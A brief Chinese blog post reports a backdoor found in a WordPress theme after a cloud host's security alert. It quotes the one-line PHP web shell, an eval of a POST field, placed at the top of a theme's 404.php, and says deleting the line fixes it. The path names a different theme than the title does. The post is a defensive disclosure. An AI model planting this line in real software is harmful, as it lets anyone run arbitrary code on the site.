wordpress的Zerif Lite免费版的一个后门

2016-9-28 liyangweb.com 李杨 PHP

最近在阿里云上安装了一个wordpress,又安装了Zerif Life主题,不久阿里云提示我某模板文件中有一个后门,于是去查看了,一下,果然是赤裸裸的后门啊,

在代码顶部竟然有这样一段:

<?php @eval($_POST['dd']);?>
路径如下:



wordpress/wp-content/themes/twentyfifteen/404.php

顺便检查了一下其他模板文件吧,可能其他文件中也存在这个后门。

解决方法当然很简单,把这一行删掉就OK了,坑爹的阿里云还非要我花钱去处理~~~


标签: wordpress

发表评论:

Powered by emlog 冀ICP备13011830号-1